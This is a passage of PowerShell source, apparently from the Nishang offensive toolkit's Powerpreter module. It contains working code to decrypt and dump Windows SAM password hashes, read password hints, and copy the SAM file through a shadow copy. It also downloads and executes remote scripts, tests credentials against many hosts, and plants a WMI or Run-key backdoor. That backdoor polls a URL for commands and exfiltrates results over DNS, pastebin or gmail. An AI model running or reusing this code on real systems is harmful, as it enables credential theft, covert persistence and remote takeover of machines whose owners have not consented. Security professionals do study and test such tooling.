2871 return ,(des_transform $data $key $true)
2872}
2873
2874function des_decrypt([byte[]]$data, [byte[]]$key)
2875{
2876 return ,(des_transform $data $key $false)
2877}
2878
2879function des_transform([byte[]]$data, [byte[]]$key, $doEncrypt)
2880{
2881 $des = new-object Security.Cryptography.DESCryptoServiceProvider;
2882 $des.Mode = [Security.Cryptography.CipherMode]::ECB;
2883 $des.Padding = [Security.Cryptography.PaddingMode]::None;
2884 $des.Key = $key;
2885 $des.IV = $key;
2886 $transform = $null;
2887 if ($doEncrypt) {$transform = $des.CreateEncryptor();}
2888 else{$transform = $des.CreateDecryptor();}
2889 $result = $transform.TransformFinalBlock($data, 0, $data.Length);
2890 return ,$result;
2891}
2892
2893function Get-RegKeyClass([string]$key, [string]$subkey)
2894{
2895 switch ($Key) {
2896 "HKCR" { $nKey = 0x80000000} #HK Classes Root
2897 "HKCU" { $nKey = 0x80000001} #HK Current User
2898 "HKLM" { $nKey = 0x80000002} #HK Local Machine
2899 "HKU" { $nKey = 0x80000003} #HK Users
2900 "HKCC" { $nKey = 0x80000005} #HK Current Config
2901 default {
2902 throw "Invalid Key. Use one of the following options HKCR, HKCU, HKLM, HKU, HKCC"
2903 }
2904 }
2905 $KEYQUERYVALUE = 0x1;
2906 $KEYREAD = 0x19;
2907 $KEYALLACCESS = 0x3F;
2908 $result = "";
2909 [int]$hkey=0
2910 if (-not [PowerDump.Native]::RegOpenKeyEx($nkey,$subkey,0,$KEYREAD,[ref]$hkey))
2911 {
2912 $classVal = New-Object Text.Stringbuilder 1024
2913 [int]$len = 1024
2914 if (-not [PowerDump.Native]::RegQueryInfoKey($hkey,$classVal,[ref]$len,0,[ref]$null,[ref]$null,
2915 [ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,0))
2916 {
2917 $result = $classVal.ToString()
2918 }
2919 else
2920 {
2921 Write-Error "RegQueryInfoKey failed";
2922 }
2923 [PowerDump.Native]::RegCloseKey($hkey) | Out-Null
2924 }
2925 else
2926 {
2927 Write-Error "Cannot open key";
2928 }
2929 return $result;
2930}
2931
2932function Get-BootKey
2933{
2934 $s = [string]::Join("",$("JD","Skew1","GBG","Data" | %{Get-RegKeyClass "HKLM" "SYSTEM\CurrentControlSet\Control\Lsa\$_"}));
2935 $b = new-object byte[] $($s.Length/2);
2936 0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)}
2937 $b2 = new-object byte[] 16;
2938 0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 | % -begin{$i=0;}{$b2[$i]=$b[$_];$i++}
2939 return ,$b2;
2940}
2941
2942function Get-HBootKey
2943{
2944 param([byte[]]$bootkey);
2945 $aqwerty = [Text.Encoding]::ASCII.GetBytes("!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%`0");
2946 $anum = [Text.Encoding]::ASCII.GetBytes("0123456789012345678901234567890123456789`0");
2947 $k = Get-Item HKLM:\SAM\SAM\Domains\Account;
2948 if (-not $k) {return $null}
2949 [byte[]]$F = $k.GetValue("F");
2950 if (-not $F) {return $null}
2951 $rc4key = [Security.Cryptography.MD5]::Create().ComputeHash($F[0x70..0x7F] + $aqwerty + $bootkey + $anum);
2952 $rc4 = NewRC4 $rc4key;
2953 return ,($rc4.encrypt($F[0x80..0x9F]));
2954}
2955
2956function Get-UserName([byte[]]$V)
2957{
2958 if (-not $V) {return $null};
2959 $offset = [BitConverter]::ToInt32($V[0x0c..0x0f],0) + 0xCC;
2960 $len = [BitConverter]::ToInt32($V[0x10..0x13],0);
2961 return [Text.Encoding]::Unicode.GetString($V, $offset, $len);
2962}
2963
2964function Get-UserHashes($u, [byte[]]$hbootkey)
2965{
2966 [byte[]]$enc_lm_hash = $null; [byte[]]$enc_nt_hash = $null;
2967
2968 # check if hashes exist (if byte memory equals to 20, then we've got a hash)
2969 $LM_exists = $false;
2970 $NT_exists = $false;
2971 # LM header check
2972 if ($u.V[0xa0..0xa3] -eq 20)
2973 {
2974 $LM_exists = $true;
2975 }
2976 # NT header check
2977 elseif ($u.V[0xac..0xaf] -eq 20)
2978 {
2979 $NT_exists = $true;
2980 }
2981
2982 if ($LM_exists -eq $true)
2983 {
2984 $lm_hash_offset = $u.HashOffset + 4;
2985 $nt_hash_offset = $u.HashOffset + 8 + 0x10;
2986 $enc_lm_hash = $u.V[$($lm_hash_offset)..$($lm_hash_offset+0x0f)];
2987 $enc_nt_hash = $u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
2988 }
2989
2990 elseif ($NT_exists -eq $true)
2991 {
2992 $nt_hash_offset = $u.HashOffset + 8;
2993 $enc_nt_hash = [byte[]]$u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
2994 }
2995 return ,(DecryptHashes $u.Rid $enc_lm_hash $enc_nt_hash $hbootkey);
2996}
2997
2998function DecryptHashes($rid, [byte[]]$enc_lm_hash, [byte[]]$enc_nt_hash, [byte[]]$hbootkey)
2999{
3000 [byte[]]$lmhash = $empty_lm; [byte[]]$nthash=$empty_nt;
3001 # LM Hash
3002 if ($enc_lm_hash)
3003 {
3004 $lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;
3005 }
3006
3007 # NT Hash
3008 if ($enc_nt_hash)
3009 {
3010 $nthash = DecryptSingleHash $rid $hbootkey $enc_nt_hash $antpassword;
3011 }
3012
3013 return ,($lmhash,$nthash)
3014}
3015
3016function DecryptSingleHash($rid,[byte[]]$hbootkey,[byte[]]$enc_hash,[byte[]]$lmntstr)
3017{
3018 $deskeys = sid_to_key $rid;
3019 $md5 = [Security.Cryptography.MD5]::Create();
3020 $rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);
3021 $rc4 = NewRC4 $rc4_key;
3022 $obfkey = $rc4.encrypt($enc_hash);
3023 $hash = (des_decrypt $obfkey[0..7] $deskeys[0]) +
3024 (des_decrypt $obfkey[8..$($obfkey.Length - 1)] $deskeys[1]);
3025 return ,$hash;
3026}
3027
3028function Get-UserKeys
3029{
3030 ls HKLM:\SAM\SAM\Domains\Account\Users |
3031 where {$_.PSChildName -match "^[0-9A-Fa-f]{8}$"} |
3032 Add-Member AliasProperty KeyName PSChildName -PassThru |
3033 Add-Member ScriptProperty Rid {[Convert]::ToInt32($this.PSChildName, 16)} -PassThru |
3034 Add-Member ScriptProperty V {[byte[]]($this.GetValue("V"))} -PassThru |
3035 Add-Member ScriptProperty UserName {Get-UserName($this.GetValue("V"))} -PassThru |
3036 Add-Member ScriptProperty HashOffset {[BitConverter]::ToUInt32($this.GetValue("V")[0x9c..0x9f],0) + 0xCC} -PassThru
3037}
3038
3039function DumpHashes
3040{
3041 LoadApi
3042 $bootkey = Get-BootKey;
3043 $hbootKey = Get-HBootKey $bootkey;
3044 Get-UserKeys | %{
3045 $hashes = Get-UserHashes $_ $hBootKey;
3046 "{0}:{1}:{2}:{3}:::" -f ($_.UserName,$_.Rid,
3047 [BitConverter]::ToString($hashes[0]).Replace("-","").ToLower(),
3048 [BitConverter]::ToString($hashes[1]).Replace("-","").ToLower());
3049 }
3050}
3051
3052 #http://www.labofapenetrationtester.com/2013/05/poshing-hashes-part-2.html?showComment=1386725874167#c8513980725823764060
3053 if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
3054 {
3055 Write-Warning "Script requires elevated or administrative privileges."
3056 Return
3057 }
3058 else
3059 {
3060 #Set permissions for the current user.
3061 $rule = New-Object System.Security.AccessControl.RegistryAccessRule (
3062 [System.Security.Principal.WindowsIdentity]::GetCurrent().Name,
3063 "FullControl",
3064 [System.Security.AccessControl.InheritanceFlags]"ObjectInherit,ContainerInherit",
3065 [System.Security.AccessControl.PropagationFlags]"None",
3066 [System.Security.AccessControl.AccessControlType]"Allow")
3067 $key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
3068 "SAM\SAM\Domains",
3069 [Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree,
3070 [System.Security.AccessControl.RegistryRights]::ChangePermissions)
3071 $acl = $key.GetAccessControl()
3072 $acl.SetAccessRule($rule)
3073 $key.SetAccessControl($acl)
3074
3075 DumpHashes
3076
3077 #Remove the permissions added above.
3078 $user = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
3079 $acl.Access | where {$_.IdentityReference.Value -eq $user} | %{$acl.RemoveAccessRule($_)} | Out-Null
3080 Set-Acl HKLM:\SAM\SAM\Domains $acl
3081
3082 }
3083}
3084
3085
3086########################################Extract password hints of Windows Users######################################################
3087function Get-PassHints {
3088<#
3089.SYNOPSIS
3090Nishang script which extracts password hint for users in clear text.
3091
3092.DESCRIPTION
3093The script extracts password hints from SAM registry hive. The script needs Administrator privs to read SAM hive.
3094
3095.EXAMPLE
3096PS > Get-PassHints
3097
3098.LINK
3099http://www.labofapenetrationtester.com/2015/09/extracting-windows-users-password-hints.html
3100https://github.com/samratashok/nishang
3101#>
3102
3103
3104
3105 #Set permissions to allow Access to SAM\SAM\Domains registry hive.
3106 #http://www.labofapenetrationtester.com/2013/05/poshing-hashes-part-2.html?showComment=1386725874167#c8513980725823764060
3107 $rule = New-Object System.Security.AccessControl.RegistryAccessRule (
3108 [System.Security.Principal.WindowsIdentity]::GetCurrent().Name,
3109 "FullControl",
3110 [System.Security.AccessControl.InheritanceFlags]"ObjectInherit,ContainerInherit",
3111 [System.Security.AccessControl.PropagationFlags]"None",
3112 [System.Security.AccessControl.AccessControlType]"Allow")
3113 $key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
3114 "SAM\SAM\Domains",
3115 [Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree,
3116 [System.Security.AccessControl.RegistryRights]::ChangePermissions)
3117 $acl = $key.GetAccessControl()
3118 $acl.SetAccessRule($rule)
3119 $key.SetAccessControl($acl)
3120
3121 #From powerdump from SET
3122 function Get-UserName([byte[]]$V)
3123 {
3124 if (-not $V) {return $null};
3125 $offset = [BitConverter]::ToInt32($V[0x0c..0x0f],0) + 0xCC;
3126 $len = [BitConverter]::ToInt32($V[0x10..0x13],0);
3127 return [Text.Encoding]::Unicode.GetString($V, $offset, $len);
3128 }
3129
3130
3131 #Logic for extracting password hint
3132 $users = Get-ChildItem HKLM:\SAM\SAM\Domains\Account\Users\
3133 $j = 0
3134 foreach ($key in $users)
3135 {
3136
3137 $value = Get-ItemProperty $key.PSPath
3138 $j++
3139 foreach ($hint in $value)
3140 {
3141 #Check for users who have passwordhint
3142 if ($hint.UserPasswordHint)
3143 {
3144 $username = Get-UserName($hint.V)
3145 $passhint = ([text.encoding]::Unicode).GetString($hint.UserPasswordHint)
3146 Write-Output "$username`:$passhint"
3147 }
3148 }
3149 }
3150
3151 #Remove the permissions added above.
3152 $user = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
3153 $acl.Access | where {$_.IdentityReference.Value -eq $user} | %{$acl.RemoveAccessRule($_)} | Out-Null
3154 Set-Acl HKLM:\SAM\SAM\Domains $acl
3155}
3156
3157
3158####################################Download and Execute a powershell script#########################################################
3159
3160
3161
3162function Download-Execute-PS
3163{
3164<#
3165.SYNOPSIS
3166Nishang script which downloads and executes a powershell script.
3167
3168.DESCRIPTION
3169This payload downloads a powershell script from specified URL and then executes it on the target.
3170
3171.PARAMETER ScriptURL
3172The URL from where the powershell script would be downloaded.
3173
3174.PARAMETER Arguments
3175The Arguments to pass to the script when it is not downloaded to disk i.e. with -nodownload function.
3176This is to be used when the scripts load a function in memory, true for most scripts in Nishang.
3177
3178.PARAMETER Nodownload
3179If this switch is used, the script is not dowloaded to the disk.
3180
3181.EXAMPLE
3182PS > Download-Execute-PS http://pastebin.com/raw.php?i=jqP2vJ3x
3183
3184.EXAMPLE
3185PS > Download-Execute-PS http://script.alteredsecurity.com/evilscript.ps1 -Argument evilscript -nodownload
3186The above command does not download the script file to disk and executes the evilscript function inside the evilscript.ps1
3187
3188.LINK
3189http://labofapenetrationtester.com/
3190https://github.com/samratashok/nishang
3191#>
3192 [CmdletBinding()] Param(
3193 [Parameter(Position = 0, Mandatory = $True)]
3194 [String]
3195 $ScriptURL,
3196
3197 [Parameter(Position = 1, Mandatory = $False)]
3198 [String]
3199 $Arguments,
3200
3201 [Switch]
3202 $nodownload
3203 )
3204
3205 if ($nodownload -eq $true)
3206 {
3207 Invoke-Expression ((New-Object Net.WebClient).DownloadString("$ScriptURL"))
3208 if($Arguments)
3209 {
3210 Invoke-Expression $Arguments
3211 }
3212 }
3213
3214 else
3215 {
3216 $webclient = New-Object System.Net.WebClient
3217 $file1 = "$env:temp\deps.ps1"
3218 $webclient.DownloadFile($ScriptURL,"$file1")
3219 $script:pastevalue = powershell.exe -ExecutionPolicy Bypass -noLogo -command $file1
3220 $pastevalue
3221 }
3222}
3223
3224
3225
3226#####################################Check credentials on remote computers and create sessions#########################################################
3227
3228function Create-MultipleSessions
3229{
3230
3231<#
3232.SYNOPSIS
3233Function which can check for credentials on remote computers and can open PSSessions if the credentials work.
3234
3235.DESCRIPTION
3236The payload uses WMI to check a credential against given list of computers. Use the -Creds parameter to specify username and password. If the script is run
3237from a powershell session with local or global admin credentials (or from a powershell session started with hashes of such account using WCE), it should be used
3238without the -Creds parameter. Use the -CreateSessions parameter to create PSSessions.
3239
3240.PARAMETER filename
3241Path to the file which stores list of servers.
3242
3243.PARAMETER Creds
3244Use this parameter to specify username (in form of domain\username) and password.
3245
3246.PARAMETER CreateSessions
3247Use this parameter to make the script create PSSessions to targets on which the credentials worked.
3248
3249.PARAMETER VerboseErrors
3250Use this parameter to get verbose error messages.
3251
3252.EXAMPLE
3253PS > Create-MultipleSessions -filename .\servers.txt
3254Above command uses the credentials available with current powershell session and checks it against multiple computers specified in servers.txt
3255
3256.EXAMPLE
3257PS > Create-MultipleSessions -filename .\servers.txt -Creds
3258Above command asks the user to provide username and passowrd to check on remote computers.
3259
3260.EXAMPLE
3261PS > Create-MultipleSessions -filename .\servers.txt -CreateSessions
3262Above command uses the credentials available with current powershell session, checks it against multiple computers specified in servers.txt and creates PSSession for those.
3263
3264.LINK
3265http://labofapenetrationtester.com/2013/04/poshing-the-hashes.html
3266https://github.com/samratashok/nishang
3267#>
3268
3269 [CmdletBinding()] Param (
3270 [Parameter(Position = 0, Mandatory = $True)]
3271 [String]
3272 $filename,
3273
3274 [Parameter(Mandatory = $False)]
3275 [Switch]
3276 $Creds,
3277
3278 [Parameter(Mandatory = $False)]
3279 [Switch]
3280 $CreateSessions,
3281
3282 [Parameter(Mandatory = $False)]
3283 [Switch]
3284 $VerboseErrors
3285 )
3286 $ErrorActionPreference = "SilentlyContinue"
3287 if ($VerboseErrors)
3288 {
3289 $ErrorActionPreference = "Continue"
3290 }
3291 $servers = Get-Content $filename
3292
3293 if ($Creds)
3294 {
3295 $Credentials = Get-Credential
3296 $CheckCommand = 'gwmi -query "Select IPAddress From Win32_NetworkAdapterConfiguration Where IPEnabled = True" -ComputerName $server -Credential $Credentials'
3297 $SessionCommand = 'New-PSSession -ComputerName $server -Credential $Credentials'
3298 }
3299
3300 else
3301 {
3302 $CheckCommand = 'gwmi -query "Select IPAddress From Win32_NetworkAdapterConfiguration Where IPEnabled = True" -ComputerName $server'
3303 $SessionCommand = 'New-PSSession -ComputerName $server'
3304 }
3305
3306 foreach ($server in $servers)
3307 {
3308 $check = Invoke-Expression $CheckCommand
3309 if($check -ne $null)
3310 {
3311 Write-Host "Credentials worked on $server !!" -ForegroundColor Green
3312 if ($CreateSessions -eq $True)
3313 {
3314 "`nCreating Session for $server"
3315 Invoke-Expression $SessionCommand
3316 }
3317 }
3318 else
3319 {
3320 "Could not connect or credentials didn't work on $server"
3321 }
3322 }
3323
3324 if ($CreateSessions -eq $True)
3325 {
3326 Write-Host "`nFollowing Sessions have been created: " -ForegroundColor Green
3327 Get-PSSession
3328 }
3329}
3330
3331##########################################Copy SAM file using Volume Shadow Service################################
3332<#
3333.SYNOPSIS
3334Nishang Payload which copies the SAM file.
3335
3336.DESCRIPTION
3337This payload uses the VSS service (starts it if not running), creates a shadow of C:
3338and copies the SAM file which could be used to dump password hashes from it. This must be run from an elevated shell.
3339
3340.PARAMETER PATH
3341The path where SAM file would be saved. The folder must exist already.
3342
3343.EXAMPLE
3344PS > Copy-VSS
3345Saves the SAM file in current run location of the payload.
3346
3347.Example
3348PS > Copy-VSS -path C:\temp
3349
3350.LINK
3351http://www.canhazcode.com/index.php?a=4
3352https://github.com/samratashok/nishang
3353
3354.NOTES
3355Code by @al14s
3356
3357#>
3358
3359
3360function Copy-VSS
3361{
3362 [CmdletBinding()] Param(
3363 [Parameter(Position = 0, Mandatory = $False)]
3364 [String]
3365 $Path
3366 )
3367 $service = (Get-Service -name VSS)
3368 if($service.Status -ne "Running")
3369 {
3370 $notrunning=1
3371 $service.Start()
3372 }
3373 $id = (gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
3374 $volume = (gwmi win32_shadowcopy -filter "ID='$id'")
3375 $filepath = "$pwd\SAM"
3376 if ($path)
3377 {
3378 $filepath = "$path\SAM"
3379 }
3380
3381 `cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SAM" $filepath`
3382 $volume.Delete()
3383 if($notrunning -eq 1)
3384 {
3385 $service.Stop()
3386 }
3387}
3388
3389
3390
3391########################################################Achieve persistence ###############################################
3392###http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/20/use-powershell-to-create-a-permanent-wmi-event-to-launch-a-vbscript.aspx
3393
3394function Persistence
3395{
3396<#
3397.SYNOPSIS
3398Function which could be used to add reboot persistence to powerpreter.
3399
3400.DESCRIPTION
3401Powerpreter is dropped into the user's temp directory (with name Update.psm1) and either WMI permanent event consumer or Registry changes is used (based on privs) for persistence.
3402The Update.psm1 is then copied to $PSModulepath of the user.
3403Persistence created using this function could be cleaned by using the Remove-Persistence function.
3404
3405.PARAMETER CheckURL
3406The URL which the payload would query for instructions.
3407
3408.PARAMETER PayloadURL
3409The URL from where commands could be sent. Function names of Powerpreter could be used here.
3410If the target has powershell v2 (or you are not sure), use Import-Module Update in the command.
3411For example: Import-Module Update; Get-Wlan-Keys
3412
3413
3414.PARAMETER PowerpreterURL
3415The URL from where powerpreter would be downloaded if it is removed from the user's temp directory.
3416
3417.PARAMETER MagicString
3418The string which would act as an instruction to the payload to proceed with download and execute.
3419
3420.PARAMETER StopString
3421The string which if found at CheckURL will stop the payload.
3422
3423.PARAMETER persist
3424Use this parameter to achieve reboot persistence. Different methods of persistence with Admin access and normal user access.
3425
3426.PARAMETER exfil
3427Use this parameter to use exfiltration methods for returning the results.
3428
3429.PARAMETER ExfilOption
3430The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
3431
3432.PARAMETER dev_key
3433The Unique API key provided by pastebin when you register a free account.
3434Unused for other options
3435
3436.PARAMETER username
3437Username for the pastebin/gmail account where data would be exfiltrated.
3438Unused for other options
3439
3440.PARAMETER password
3441Password for the pastebin/gmail account where data would be exfiltrated.
3442Unused for other options
3443
3444.PARAMETER URL
3445The URL of the webserver where POST requests would be sent.
3446
3447.PARAMETER DomainName
3448The DomainName, whose subdomains would be used for sending TXT queries to.
3449
3450.PARAMETER AuthNS
3451Authoritative Name Server for the domain specified in DomainName
3452
3453.Example
3454PS > Persistence
3455The payload will ask for all required options.
3456
3457.Example
3458PS > Persistence http://pastebin.com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start stopthis -exfil -ExfilOption DNS -DomainName example.com -AuthNS 8.8.8.8
3459Use above command for using exfiltration methods.
3460
3461
3462.LINK
3463http://labofapenetrationtester.com/
3464https://github.com/samratashok/nishang
3465http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/20/use-powershell-to-create-a-permanent-wmi-event-to-launch-a-vbscript.aspx
3466#>
3467
3468
3469[CmdletBinding(DefaultParameterSetName="noexfil")] Param(
3470
3471 [Parameter(Parametersetname="exfil")]
3472 [Switch]
3473 $exfil,
3474
3475 [Parameter(Position = 0, Mandatory = $True, Parametersetname="exfil")]
3476 [Parameter(Position = 0, Mandatory = $True, Parametersetname="noexfil")]
3477 [String]
3478 $CheckURL,
3479
3480 [Parameter(Position = 1, Mandatory = $True, Parametersetname="exfil")]
3481 [Parameter(Position = 1, Mandatory = $True, Parametersetname="noexfil")]
3482 [String]
3483 $PayloadURL,
3484
3485 [Parameter(Position = 2, Mandatory = $True, Parametersetname="exfil")]
3486 [Parameter(Position = 2, Mandatory = $True, Parametersetname="noexfil")]
3487 [String]
3488 $PowerpreterURL,
3489
3490 [Parameter(Position = 3, Mandatory = $True, Parametersetname="exfil")]
3491 [Parameter(Position = 3, Mandatory = $True, Parametersetname="noexfil")]
3492 [String]
3493 $MagicString,
3494
3495 [Parameter(Position = 4, Mandatory = $True, Parametersetname="exfil")]
3496 [Parameter(Position = 4, Mandatory = $True, Parametersetname="noexfil")]
3497 [String]
3498 $StopString,
3499
3500 [Parameter(Position = 5, Mandatory = $False, Parametersetname="exfil")] [ValidateSet("gmail","pastebin","WebServer","DNS")]
3501 [String]
3502 $ExfilOption,
3503
3504 [Parameter(Position = 6, Mandatory = $False, Parametersetname="exfil")]
3505 [String]
3506 $dev_key = "null",
3507
3508 [Parameter(Position = 7, Mandatory = $False, Parametersetname="exfil")]
3509 [String]
3510 $username = "null",
3511
3512 [Parameter(Position = 8, Mandatory = $False, Parametersetname="exfil")]
3513 [String]
3514 $password = "null",
3515
3516 [Parameter(Position = 9, Mandatory = $False, Parametersetname="exfil")]
3517 [String]
3518 $URL = "null",
3519
3520 [Parameter(Position = 10, Mandatory = $False, Parametersetname="exfil")]
3521 [String]
3522 $DomainName = "null",
3523
3524 [Parameter(Position = 11, Mandatory = $False, Parametersetname="exfil")]
3525 [String]
3526 $AuthNS = "null"
3527
3528 )
3529
3530 $backdoorcode = @'
3531function Persistence_HTTP ($CheckURL, $PayloadURL, $MagicString, $StopString, $ExfilOption, $dev_key, $username, $password, $URL, $DomainName, $AuthNS, $exfil)
3532{
3533 while($true)
3534 {
3535 $exec = 0
3536 start-sleep -seconds 5
3537 $webclient = New-Object System.Net.WebClient
3538 $filecontent = $webclient.DownloadString("$CheckURL")
3539 if($filecontent -eq $MagicString)
3540 {
3541 $pastevalue = Invoke-Expression $webclient.DownloadString($PayloadURL)
3542 $exec++
3543 if ($exfil -eq $True)
3544 {
3545 Do-Exfiltration "$pastevalue" "$ExfilOption" "$dev_key" "$username" "$password" "$URL" "$DomainName" "$AuthNS"
3546 }
3547 if ($exec -eq 1)
3548 {
3549 Start-Sleep -Seconds 60
3550 }
3551 }
3552 elseif ($filecontent -eq $StopString)
3553 {
3554 break
3555 }
3556 }
3557}
3558'@
3559 $powerpreterpath = $MyInvocation.MyCommand.Module.Path
3560 Copy-Item $powerpreterpath -Destination $env:TEMP\Update.psm1
3561 echo "Set objShell = CreateObject(`"Wscript.shell`")" > "$env:temp\update.vbs"
3562 echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\update.ps1`")" >> "$env:temp\update.vbs"
3563 echo "if (!(Test-Path $env:TEMP\Update.psm1)) {(New-Object Net.WebClient).DownloadFile(`"$PowerpreterURL`",`"$env:temp\Update.psm1`")}" >> "$env:temp\update.ps1"
3564 echo "mkdir `"$home\Documents\WindowsPowerShell\Modules\Update(x64)`", `"$home\Documents\WindowsPowerShell\Modules\Update`", `"$home\Documents\WindowsPowerShell\Modules\UpdateCheck`"" > "$env:temp\update.ps1"
3565 echo "`$currentpath = `"$env:temp\Update.psm1`"" >> "$env:temp\update.ps1"
3566 echo "Copy-Item `$currentpath -Destination `"$home\Documents\WindowsPowerShell\Modules\Update`"" >> "$env:temp\update.ps1"
3567 Out-File -InputObject $backdoorcode -Append "$env:TEMP\update.ps1"
3568 $currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
3569 if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
3570 {
3571 $filterNS = "root\cimv2"
3572 $wmiNS = "root\subscription"
3573 $query = @"
3574 Select * from __InstanceCreationEvent within 3
3575 where targetInstance isa 'Win32_LogonSession'
3576"@
3577 $filterName = "WindowsSanity"
3578 $scriptpath = $env:TEMP
3579 $scriptFileName = "$scriptpath\update.vbs"
3580 $filterPath = Set-WmiInstance -Class __EventFilter -Namespace $wmiNS -Arguments @{name=$filterName; EventNameSpace=$filterNS; QueryLanguage="WQL"; Query=$query}
3581 $consumerPath = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace $wmiNS -Arguments @{name="WindowsSanity"; ScriptFileName=$scriptFileName; ScriptingEngine="VBScript"}
3582 Set-WmiInstance -Class __FilterToConsumerBinding -Namespace $wmiNS -arguments @{Filter=$filterPath; Consumer=$consumerPath} | out-null
3583 $options = "Persistence_HTTP $CheckURL $PayloadURL $MagicString $StopString"
3584 if ($exfil -eq $True)
3585 {
3586 $options = "Persistence_HTTP $CheckURL $PayloadURL $MagicString $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
3587 }
3588 Out-File -InputObject $options -Append "$env:TEMP\update.ps1"
3589 }
3590 else
3591 {
3592 New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value "$($env:temp)\update.vbs" -force
3593 $options = "Persistence_HTTP $CheckURL $PayloadURL $MagicString $StopString"
3594 if ($exfil -eq $True)
3595 {
3596 $options = "Persistence_HTTP $CheckURL $PayloadURL $MagicString $StopString $ExfilOption $dev_key $username $password $URL $DomainName $AuthNS $exfil"
3597 }
3598 Out-File -InputObject $options -Append "$env:TEMP\update.ps1"
3599 }
3600
3601 Invoke-Expression "$env:TEMP\update.vbs"
3602}
3603
3604
3605########################################################## Clear Persistence ##############################################################
3606function Remove-Persistence
3607{
3608 <#
3609.SYNOPSIS
3610Function which could be used to clear the persistence added by backdoors and keylogger.
3611
3612.DESCRIPTION
3613This function cleans WMI events and Registry keys added by various payloads and Add-persistence script of Nishang.
3614Run the function as an Administrator to remove the WMI events.
3615
3616.Example
3617PS > Remove-Persistence
3618
3619.LINK
3620http://labofapenetrationtester.com/
3621https://github.com/samratashok/nishang
3622http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/20/use-powershell-to-create-a-permanent-wmi-event-to-launch-a-vbscript.aspx
3623#>
3624 [CmdletBinding(DefaultParameterSetName="noexfil")] Param(
3625 [Parameter(Position = 0)] [Switch]
3626 $Remove
3627 )
3628
3629 if ($Remove -eq $true)
3630 {
3631 $currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
3632 if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -ne $true)
3633 {
3634 Write-Warning "Run the Command as an Administrator. Removing Registry keys only."
3635 Remove-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -ErrorAction SilentlyContinue
3636 Break
3637 }
3638
3639 Write-Output "Removing the WMI Events."
3640 $filterName = "WindowsSanity"
3641 gwmi __eventFilter -namespace root\subscription -filter "name='WindowsSanity'"| Remove-WmiObject
3642 gwmi activeScriptEventConsumer -Namespace root\subscription | Remove-WmiObject
3643 gwmi __filtertoconsumerbinding -Namespace root\subscription -Filter "Filter = ""__eventfilter.name='WindowsSanity'""" | Remove-WmiObject
3644 Write-Output "Removing the Registry keys."
3645 Remove-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -ErrorAction SilentlyContinue
3646 }
3647 $Regkey = Get-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -name Update -ErrorAction SilentlyContinue
3648 $wmi_1 = gwmi __eventFilter -namespace root\subscription -filter "name='WindowsSanity'"
3649 $wmi_2 = gwmi activeScriptEventConsumer -Namespace root\subscription
3650 $wmi_3 = gwmi __filtertoconsumerbinding -Namespace root\subscription -Filter "Filter = ""__eventfilter.name='WindowsSanity'"""
3651 if ($Regkey -ne $null )
3652 {
3653 Write-Warning "Run Registry key persistence found. Use with -Remove option to clean."
3654 }
3655 elseif (($wmi_1) -and ($wmi_2) -and ($wmi_3) -ne $null)
3656 {
3657 Write-Warning "WMI permanent event consumer persistence found. Use with -Remove option to clean."
3658 }
3659 else
3660 {
3661 Write-Output "No Persistence found."
3662 }
3663}
3664
3665
3666#########################################################Pivoting to other systems##########################################################
3667function Pivot
3668{
3669
3670<#
3671.SYNOPSIS
3672Function which provides pivoting to other machines in a network.
3673
3674.DESCRIPTION
3675The functionality uses powershell remoting to connect to remote machines. Pivoting could be interactive or non-interactive.
3676Credentials are required to use this function. Username/pass or a shell with rights to access remote machines could be used as credentials.
3677
3678.PARAMETER Computer
3679Name of the computer(s) to connect to.
3680
3681.PARAMETER User
3682Username to be used to connect to the target (optional).
3683
3684.PARAMETER Pass
3685Password to be used to connect to the target (optional).
3686
3687.PARAMETER cmd
3688Cmd to be executed on the target. Mandatory in case of non-interactive.
3689
3690.PARAMETER Non_Interactive
3691If specified, the pivtoing is non-interactive. It is interactive by default.
3692
3693.EXAMPLE
3694PS > Pivot -Computer <target>
3695Above command uses the credentials available with current powershell session (or other shell) to connect to target.
3696It creates PSSsessions. Use Use-Session to interact with the created sessions.
3697
3698.EXAMPLE
3699PS > Pivot -Computer <Get-Content .\targets.txt> -User Administrator -Pass P@ssword123#
